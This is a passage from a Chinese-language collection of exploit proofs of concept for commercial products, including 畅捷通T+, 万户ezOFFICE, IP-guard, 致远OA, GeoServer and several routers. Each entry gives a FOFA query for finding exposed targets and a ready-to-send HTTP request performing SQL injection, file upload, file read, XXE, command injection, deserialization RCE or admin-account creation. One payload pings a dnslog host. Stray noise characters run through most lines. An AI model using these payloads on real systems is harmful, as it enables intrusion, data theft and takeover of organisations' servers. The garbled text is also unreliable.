"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
5 n" [+ x" `8 c1 K4 z: Z "StartInfo": {) k% }# ?4 H* K! p: B6 Y
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",% F9 h' Z' l# }
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"- l3 N$ Q9 h# J2 f$ [7 `, ]4 C
}$ d; b7 l# q" S4 M! b* L0 _, G' V
}) A+ V! Z' s3 F, w8 e& m- [# H5 [
}2 C# A2 f1 R4 u8 k* H! K z. B
}
+ K) y% O1 q! r/ L% k3 W- K) E* _, d& n
0 [7 }7 ]/ }# [57. 畅捷通T+ keyEdit.aspx SQL注入; ~; J) Z+ z) ~' ^
FOFA:app="畅捷通-TPlus"; L* {5 e' G7 y1 l& @1 u: o" ~
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.13 A( v6 A4 R4 m* [1 W
Host: host
9 {5 S% n: P0 I* IUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
( l& }2 d9 C9 W) K0 [" K* q) O( y1 IAccept-Charset: utf-8, P& b8 @7 [+ J
Accept-Encoding: gzip, deflate9 _. g: {% p9 h5 I5 A; U5 t$ y
Connection: close4 k- C& y% `* ~- L2 h
8 n3 X. c( Q% T5 Q& U1 k. ]6 D ? A; ~5 W, O( V2 G! T$ D6 K
58. 畅捷通T+ KeyInfoList.aspx sql注入1 h6 N0 K9 A6 @. e
FOFA:app="畅捷通-TPlus"
' w' E. w# O8 {5 U7 x. _GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.15 y! F" H2 a* n; {
Host: your-ip
7 q+ L. R% g4 MUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36* Y( ]7 P' R, w5 \7 C6 ]
Accept-Charset: utf-8
9 Y; c2 c6 B- D! KAccept-Encoding: gzip, deflate
7 T1 A' u7 r0 PConnection: close
H% l' O* ~( ]/ M! _- W' q/ ~2 X4 O, l& `
: Z, f) b. k2 F0 G# K) I" r% F' ?$ ?59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
- P: g- h' }' Y3 b6 `8 {$ E+ JFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"& k3 r2 d; a& I- M* @5 _9 x9 u* t" O
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1( f: C) ]+ e! B) D& D- \
Host: 192.168.86.128:9090
: }) }* ]; [0 {7 j6 ]% M3 }User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36% q5 G8 x2 P/ [
Connection: close
+ U6 u: A/ `# a" KContent-Length: 1669
' f( x# p, k( ]' NAccept: */*- @6 h7 ~0 Q7 G, Z5 h$ G
Accept-Language: en( Z4 N: Y1 ` P; G4 V- q3 Q2 z& {
Content-Type: application/x-www-form-urlencoded
$ z ?8 z: S5 _+ \9 w7 l; lAccept-Encoding: gzip7 n+ ]4 f( t2 M( @
! D8 q) W9 w5 a$ `
PAYLOAD9 Z/ C. f& Y8 @6 _( \
" J. X% {( ~7 n3 |: q
, f1 M1 S+ s3 b' W! y0 L60. 百卓Smart管理平台 importexport.php SQL注入$ v% y8 i$ S+ b: f
FOFA:title="Smart管理平台"
( W2 n+ t8 `* R. Y9 O" uGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
% H' ]& l7 V7 ~7 P4 @9 f$ ?Host:
8 i* d/ S6 g; C- L: WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36/ }' C$ g( j! D% {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 b- Q3 T; {) d: Y7 y+ w8 @Accept-Encoding: gzip, deflate
9 z$ X# I3 l- S8 s5 ^+ bAccept-Language: zh-CN,zh;q=0.93 i$ q( ?* p1 ?. z
Connection: close
6 M* m u0 N- U0 v7 \6 B( e. Q8 R/ n; Q0 t' f" @
9 ~; h9 l# Q: @$ {, n# N1 w61. 浙大恩特客户资源管理系统 fileupload 任意文件上传$ n2 A( E4 C* d) ^) q# k
FOFA: title="欢迎使用浙大恩特客户资源管理系统", W0 G! g, v" ~9 P* W* U3 ~
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
% Y8 a+ g, a% ?0 gHost: x.x.x.x2 n/ g D6 d0 p3 D: b# e7 q$ R# \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ D3 E/ W1 v* J; p$ N
Connection: close
! S3 p6 T* Y6 u1 _1 ?* S5 S2 iContent-Length: 27" T; v- d% A2 b$ W; i6 n8 ]7 X& b
Accept: */*0 Z y) B/ I* L" y! e
Accept-Encoding: gzip, deflate) @# U( P ^ @8 ~1 q# _" M
Accept-Language: en
8 j' b2 N9 N2 UContent-Type: application/x-www-form-urlencoded
5 ~( ^- h7 O+ Z+ x* \4 @" J1 D2 @) e, V& D" J) ]
8uxssX66eqrqtKObcVa0kid98xa6 d' |' O* \3 p; B" D$ v, E0 H% X
2 d# L0 V- F/ h1 r1 h/ n+ T- c
, P+ s) ~( \9 S$ Y; _ u9 m62. IP-guard WebServer 远程命令执行
' X J4 N! q: |! l9 W2 ^FOFA:"IP-guard" && icon_hash="2030860561"! O4 U2 b7 ]+ T
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
( z$ Y* c# f7 |4 c( GHost: x.x.x.x
4 ^7 G2 ~; H; N- D$ J. p6 L5 i0 LUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
4 E& \ \# O# A& _Connection: close5 ^; r7 V5 k, r3 i
Accept: */*
5 [3 L5 w1 o6 r3 T0 z4 f4 jAccept-Language: en
0 I0 V7 {$ ?+ BAccept-Encoding: gzip
) O- |" M& `/ B! U" \$ {! Z
4 U0 W: [8 s. t
) Y+ w) j K; q* ^& y- G) ^访问5 V* v0 J, p s' }
& D. c( v. k$ V xGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
$ E7 @1 m6 d ?1 nHost: x.x.x.x
5 Y q6 A ^# r8 j; R2 T2 g
6 e& ~: I V+ v8 ?& i$ d) l- H
4 F; k3 q: c' t" u+ c: a63. IP-guard WebServer任意文件读取
. P- y% h6 P! q* q% JIP-guard < 4.82.0609.0+ a$ ?7 G& j5 v, ^+ P" Q3 O
FOFA:icon_hash="2030860561"
5 m7 A7 | J( `" ` Z8 YPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1, h2 t) `0 B/ S6 q
Host: your-ip- t% K0 y2 k+ ]) I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.369 F0 w2 p% G6 i d* k: g; Q. M7 ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ A" a/ \( u" Z
Accept-Encoding: gzip, deflate
" a% v9 i' \( H! b4 L. r& q: QAccept-Language: zh-CN,zh;q=0.9- A5 x& c0 f& l. G
Connection: close
* s N, d9 D3 k9 P* T: C; ZContent-Type: application/x-www-form-urlencoded
$ u' E$ q% F+ e7 j, [! P( d( W' ^3 K% J
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A ]' e( G* h: T, h; A: k
! U) Q4 R9 b% e7 @: d" ]; i64. 捷诚管理信息系统CWSFinanceCommon SQL注入
! K; H, L+ M _+ k* X3 DFOFA:body="/Scripts/EnjoyMsg.js"
/ r6 w4 ?; Q3 D0 S& _: BPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
& G; W& l5 m" `Host: 192.168.86.128:9001
1 c" d" W* D9 \8 ~User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.366 r7 J0 z1 d; Z8 }5 C$ ]
Connection: close% f6 M! S( M, n# o4 w# E& X! \
Content-Length: 369( T2 E+ s. F5 G) I! w1 M
Accept: */*& k" \+ V% J/ g ~
Accept-Language: en6 e4 Z0 Y8 U7 j- W+ U
Content-Type: text/xml; charset=utf-8* x- s" M: b# A1 U7 Y+ J
Accept-Encoding: gzip
) `3 q- K6 e5 r$ H- E- B) C) ]# g- ]: Y! p
<?xml version="1.0" encoding="utf-8"?>; w# ^$ |& C& `8 |- q* x& f7 v) m
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
0 y6 C: ^8 O M<soap:Body>
+ v9 ~& ]" j' X3 c+ c( E+ d <GetOSpById xmlns="http://tempuri.org/">5 i/ s5 L# Q8 n# V( t$ N1 ~
<sId>1';waitfor delay '0:0:5'--+</sId>5 ~8 }2 j' v* s) w' D: k
</GetOSpById>
5 k4 G% O3 ]2 h1 u3 v! V* }, X </soap:Body>
3 I7 l: C8 ~7 G& {+ k</soap:Envelope>
5 r5 ` [: e8 \1 X! o
( W0 q' v5 N8 N8 G L6 ^. n- V6 W& h- l
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过3 a8 i1 x2 j, K! D
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
# ] k9 L4 P9 K响应200即成功创建账号test123456/123456
( v' V5 u- ?, W6 g0 k& IPOST /SystemMng.ashx HTTP/1.1
9 K, z1 J B+ C. `4 i! O( y h! BHost:
, S$ e; R8 Z5 J, j$ iUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)8 E3 B5 i7 _/ w/ Y4 B* t
Accept-Encoding: gzip, deflate# k" d! R, {% F
Accept: */* F2 `/ V7 m% ~: M
Connection: close
* L/ v2 h2 y* ~/ VAccept-Language: en" M7 z, ~2 d2 Y% K: }
Content-Length: 174
8 i3 F5 o9 T9 W \7 B: J. o
9 _6 y/ } } zoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
, n3 A4 P7 {- s+ B& S3 D( d! v+ b
( Y S. t! h, P2 W% Q5 j8 {
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
6 c9 K+ T& n8 X3 Q* s# l* pFOFA:app="万户ezOFFICE协同管理平台"! I# O0 o; b, I
* C" h/ ^. N) \/ i& J b, }GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1! _8 N' H3 h4 V( _
Host: x.x.x.x" W5 r) o! D- J ]3 S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.367 C! Q, b9 {. t/ }# k, g4 M$ a) L
Connection: close9 V2 P3 S. d2 U% F* W& w7 P
Accept: */*
' G3 z& D. I2 E, qAccept-Language: en7 V ? ?- C$ O p
Accept-Encoding: gzip; y, B+ \+ k: w4 Z8 M
* N/ ^ q2 } H2 @5 k" g! a1 O& j& [
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
( g- g2 u+ k% f, c) W) n7 A: O: \0 {2 f
67. 万户ezOFFICE wpsservlet任意文件上传
8 a8 l9 \. e; U. i# b7 T2 X# IFOFA:app="万户网络-ezOFFICE"$ }: {# p6 Q4 v# C4 n
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型# j. d Q& J" O5 H8 U
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.10 L4 P$ Y# o. N; q; R T' @
Host: x.x.x.x: v) P' I4 R) j. U2 h3 t* o
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
+ M4 |) g. w/ E6 lContent-Length: 173. f8 F/ G+ Q7 c3 W8 T! u' l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.83 \" U# f3 b4 C3 j1 p V E; t
Accept-Encoding: gzip, deflate
% c8 C- n. V2 d. t7 xAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.35 j, d I- a6 ?8 C1 y, m
Connection: close
8 g2 b6 B3 c, t4 T# Q* G) ]8 d: FContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
4 s8 Y; n: L- A2 [8 l x' L0 O4 NDNT: 11 H: G! m( a5 l- C2 m
Upgrade-Insecure-Requests: 1
" ~/ a; { g) n4 T1 Y
) z& d3 ~3 n- A/ U- k" T0 B$ [--ufuadpxathqvxfqnuyuqaozvseiueerp5 ]1 K% w% v7 C: H# f
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"5 E' x1 g' Z6 K9 M! h
: @) y7 x4 b' C( q( l1 P3 b3 M) f A
<% out.print("sasdfghjkj");%>
2 J) P1 \2 ]5 `+ N--ufuadpxathqvxfqnuyuqaozvseiueerp--
' j7 Y6 w7 U2 y) g& P. O- ~% t0 Y2 H1 z
5 p: {3 }, e! o3 ~ |/ [( |文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
1 J {' d) [3 N2 W- o
- ] q' H# @6 J- B" b9 G68. 万户ezOFFICE wf_printnum.jsp SQL注入* Y& T! Y$ h% @, ?! Z8 E& N
FOFA:app="万户ezOFFICE协同管理平台"1 t& L1 F% W; j2 ]) ], Z
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
& |" p7 o: N8 P( U8 ]+ ?Host: {{host}}
, D3 A& m R- H/ E( Z L0 e/ FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.366 |; P3 ^8 f4 h1 w# Q2 a" J
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
( r2 q" b% `! j4 eAccept-Encoding: gzip, deflate
: P) a7 u! ?' x1 p% wAccept-Language: zh-CN,zh;q=0.9# C! Y4 f. d+ M& `' q
Connection: close- e0 m5 x' I X$ `
6 X! a. o" P5 ~4 G7 [
7 E) X3 {8 ?7 W3 K69. 万户 ezOFFICE contract_gd.jsp SQL注入; h7 c8 ?; c1 U8 x+ S, i0 B
FOFA:app="万户ezOFFICE协同管理平台"
! G: f* k2 X$ Y. QGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1$ K- l+ B; }" F# h: @, y
Host: your-ip
3 W5 }3 x; X. y# S$ ZUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
; z- G9 ^8 M: P& U/ L3 o2 m. _Accept-Encoding: gzip, deflate. u; h) E+ O A6 d( f
Accept: */*
! k" @8 |5 Y0 xConnection: keep-alive
( e+ ]; `& o5 W/ t" C; e, b& n" n7 Z$ R0 v' h' _" N: [
& g4 K, v/ B. s
70. 万户ezEIP success 命令执行/ `+ h6 ^* [4 u. J* ?
FOFA:app="万户网络-ezEIP"; y0 S( d# M( h) h; D) o/ M. q, }1 R, W
POST /member/success.aspx HTTP/1.1 X3 v) u7 b% Q1 W
Host: {{Hostname}}) w" {! p' O( b& b, F2 _* U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36- O; ~" Y; T7 G* q
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
7 Q: A+ L( Z" u# B3 T" TContent-Type: application/x-www-form-urlencoded# r$ G, O( P5 C1 |+ a/ V. z( W6 x
TYPE: C: y7 N) d- z% x: q
Content-Length: 16702- K8 B8 v0 y1 g
" H8 T2 ^# j9 A7 V: q' y2 v2 K
__VIEWSTATE=PAYLOAD- k. X9 C6 R: n
$ s0 y( @# B* f$ M( i' O6 ^* B7 c. ^0 L8 z* a7 L5 u8 A* V
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入, b) X: H8 m7 N3 c* a, o; A
FOFA:body="PM2项目管理系统BS版增强工具.zip"
/ r9 {. u9 Q) n; eGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1: G- c1 f. A- j0 i& E
Host: x.x.x.xx.x.x.x
# {3 W8 Q+ i- t& I, ~: c. |User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.360 f1 m, h' d% ]& \2 F7 `' Q
Connection: close1 A, |9 R$ d( q4 x6 R) i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* T& ]; D# p) U! c
Accept-Encoding: gzip, deflate- z' x4 @* Z, p+ F
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: f6 P8 Y! S! I1 sUpgrade-Insecure-Requests: 1
3 Z% Q0 H4 a0 [5 v3 Z6 Z3 [5 c8 Y9 d/ ~7 P% l
7 Q( V4 q0 ?0 h. c7 b72. 致远OA getAjaxDataServlet XXE
; \4 z2 x; Q* V" u* f# D. vFOFA:app="致远互联-OA"
% \8 C2 G6 _" i0 z6 VPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1: j F1 G1 ~9 h+ n5 O4 F
Host: 192.168.40.131:8099
2 x2 j6 J% S5 x7 HUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
7 v! f0 ?* m# @! g3 _. GConnection: close5 E! J! ?& M4 |6 ?$ R6 R
Content-Length: 583& k; e$ Y6 n5 B) Z
Content-Type: application/x-www-form-urlencoded$ r! _, P3 h/ _ X+ d8 x
Accept-Encoding: gzip& ~; D" f0 K7 A# W
9 L% @/ s: S' @% p, T
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
E) F/ s1 A: E8 Q1 C, B. K9 {/ w! R6 D4 A- ]5 t, U
6 I0 @% \- q g2 `- U1 H, Y73. GeoServer wms远程代码执行
" P% n# f% c" q/ ^, o2 RFOFA:icon_hash=”97540678”: e! v5 r3 { q
POST /geoserver/wms HTTP/1.1) h3 [! m+ D4 q. v3 U# t
Host:9 J! f3 C! _3 C; \9 n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36/ f: P5 H- ]2 U. L0 w6 {4 H2 n
Content-Length: 1981' h* r Q. r6 t
Accept-Encoding: gzip, deflate: ]: O3 B2 k- k
Connection: close
; x* q3 ~7 d& m1 r% H1 t1 r- nContent-Type: application/xml; ~0 X. X& A9 t5 L/ m; a+ h7 P
SL-CE-SUID: 3
( R4 x9 M9 F% E# U: T1 C$ O' m. X$ E/ D4 ]7 s
PAYLOAD$ Q$ }% N+ v$ B0 d( V
' x$ [( z3 @7 V7 N
0 K$ S! H( m0 f& B7 b& T74. 致远M3-server 6_1sp1 反序列化RCE
3 a, b; w s( RFOFA:title="M3-Server"
6 n1 a; ~7 B$ a j; B0 [PAYLOAD! ?. e, o# m7 V0 A+ |' y' ^# M1 ~- x
0 [9 z2 n; E5 B75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE; Z4 Y" w; ^% p0 F3 d
FOFA:app="TELESQUARE-TLR-2005KSH"2 ]0 T- i0 z$ D5 E
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.12 x2 x4 F4 Q9 K" p- N
Host: x.x.x.x
9 ~0 u W! [) b" ]1 r* dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36/ ~( L$ v7 }$ E+ @
Connection: close
, G1 P0 s% K- l6 n0 @3 d% F* c5 NAccept: */*
4 ~( H' x. g' J7 ZAccept-Language: en9 b* n, p8 b% ^9 z7 U
Accept-Encoding: gzip
' Z; e! [6 f& X& N" e+ V. S( w) B
; M& C0 E7 H+ G2 G
GET /cgi-bin/test28256.txt HTTP/1.1; n. I% f2 Q; a/ P% Y( y
Host: x.x.x.x6 k# S, m/ n, x* l2 p
4 Y4 R' H: T: o. V9 F! C
2 Z. t0 Y: w" a/ O& O& T4 ]76. 新开普掌上校园服务管理平台service.action远程命令执行/ f c3 A& @$ h2 n
FOFA:title="掌上校园服务管理平台"( Z h2 m& r- X% }4 u* b6 q
POST /service_transport/service.action HTTP/1.1+ o# \& w1 \% w4 x
Host: x.x.x.x/ W: b9 D& k, o; p" p. P8 d$ f5 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.09 g3 y$ z' q0 @2 @
Connection: close; a; V# z: Z2 J2 p( M
Content-Length: 211+ l, m1 i' U: l- J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 E3 K+ ^( X2 s, b/ l2 ^Accept-Encoding: gzip, deflate
' W q! K, r+ W; L* XAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# x8 e3 J3 q& O% ~( n: f% uCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
( ^: ]$ d9 W. ~) @8 i gUpgrade-Insecure-Requests: 16 w( g4 Q t# }$ E5 l% r4 U
0 v" Q R; _8 w a3 i4 P4 ?! ]{4 D* q7 ] I( c* L2 T' A x
"command": "GetFZinfo",
* O+ c3 O$ |' L5 |* I, e "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
/ g% H3 ?, L% B1 c4 r ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
8 A, g7 I: ^, h" P}
- |! Y; i( G( {6 b% ~5 G1 z f1 a. X2 _* B3 B) A
( }( K% L$ w1 }) C. H% y
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1$ ] T" D2 R! c2 D6 d
Host: x.x.x.x
# P& S! f* ` i* d0 A8 {! X& S. G+ A1 D) V3 K- l
4 c* J; W" W0 Q
: @( U0 L. `, S/ n: `
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
! U, o0 B) y7 Z D5 l& H: dFOFA:body="F22WEB登陆"- T3 @. Y0 C3 a: Y
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1' g7 w4 r8 F3 m
Host: x.x.x.x
; h' A3 J& A. l. dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
; R3 Y$ ^& E" [Connection: close& `; D& }1 B: N0 m! @+ M
Content-Length: 4331 n* K$ k- }0 P \( ? a2 C
Accept: */*
. o" w1 m9 B) F8 j: _- x. S! \) ^Accept-Encoding: gzip, deflate( m& b5 V U$ \" A" y6 L: a S
Accept-Language: zh-CN,zh;q=0.92 C; {/ ]- ~; C7 v6 \
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
! o0 s& \% g2 s V4 r2 S
* j1 g" ^0 n6 u. U, Q: P------------398jnjVTTlDVXHlE7yYnfwBoix$ Y% U4 T j0 o* G( q4 x
Content-Disposition: form-data; name="folder"
) V6 r3 F' A& G( T5 W: r% `! }( i8 \% n+ r0 U3 z
/upload/udplog" D% b! Y6 P9 o! H2 D7 s
------------398jnjVTTlDVXHlE7yYnfwBoix
) c. P$ y+ E3 _2 t0 MContent-Disposition: form-data; name="Filedata"; filename="1.aspx"7 |+ X% j: l9 J
Content-Type: application/octet-stream
/ H' h; n1 C: w: y) A0 ]/ H, {! l1 @# i! x; b
hello12345678 k5 ^% r+ f) ?; x
------------398jnjVTTlDVXHlE7yYnfwBoix* R4 n6 n+ \! U2 E
Content-Disposition: form-data; name="Upload"6 a# Z# G0 a6 V# ?
3 O3 X. Q5 Q7 n% E3 r7 ESubmit Query3 r- F; E: H" j" {2 [
------------398jnjVTTlDVXHlE7yYnfwBoix--
" s2 y% h) o- T9 q) a' \' u/ ~# Z: I/ \( {7 G1 {
. S* S! [& Q9 V$ t5 D- w E
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
' |- w4 A! S" }9 B0 i3 O( DFOFA:icon_hash="2001627082"
; h' x5 G. ~% s1 zPOST /Platform/System/FileUpload.ashx HTTP/1.1, g2 R! ^3 \( J! X+ W8 j
Host: x.x.x.x9 o7 ~# e0 B6 t: v' O& j K, N% J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: ~6 V. m. W- i! x2 b4 z- @
Connection: close! h1 H8 [( b4 f, U9 f( g5 o' k
Content-Length: 336, l: j4 R" D9 u7 L/ B% |
Accept-Encoding: gzip) C' j7 _4 L. x5 \& P
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
* Z" F+ [: ^. b9 X4 r3 _- ?2 `0 ]! d
------YsOxWxSvj1KyZow1PTsh98fdu6l! W, f9 m4 k" E l7 p8 e
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
! N# F2 r* r$ z# }- OContent-Type: image/png
! q% J* X4 r& B5 R. Z( u: n$ u9 L* w& N1 B9 B1 X- s
YsOxWxSvj1KyZow1PTsh98fdu6l
0 u" A" x. u/ N2 r. C4 E9 U. Z------YsOxWxSvj1KyZow1PTsh98fdu6l S+ H9 V! V7 O; n
Content-Disposition: form-data; name="target" u) z; D- M; Q
* e7 z2 `1 C# `, W/Applications/SkillDevelopAndEHS/
/ l. d7 R, H$ G% G9 y------YsOxWxSvj1KyZow1PTsh98fdu6l--
% y8 c ^+ j1 C9 r
1 a# } r- {9 F; D. @! N% Z1 ]0 T/ Q% N% I. x% h& Z. h
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1: r% Q4 \1 X; d% B4 k
Host: x.x.x.x
& x1 h9 d7 H" x5 ~! u& {, V s: r( r+ @" f* e! A- F3 ]4 B1 X7 L" q$ z
( i0 ^ J/ u( a: U
79. BYTEVALUE 百为流控路由器远程命令执行2 J% \5 B; ]0 H# P# ~9 m% }# M
FOFA:BYTEVALUE 智能流控路由器
0 B; \7 V) D: Y& |! {& sGET /goform/webRead/open/?path=|id HTTP/1.1% }) ?. @& F+ V
Host:IP
$ |( {9 v* }5 f1 o3 ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0. m* k- F( g" q/ d
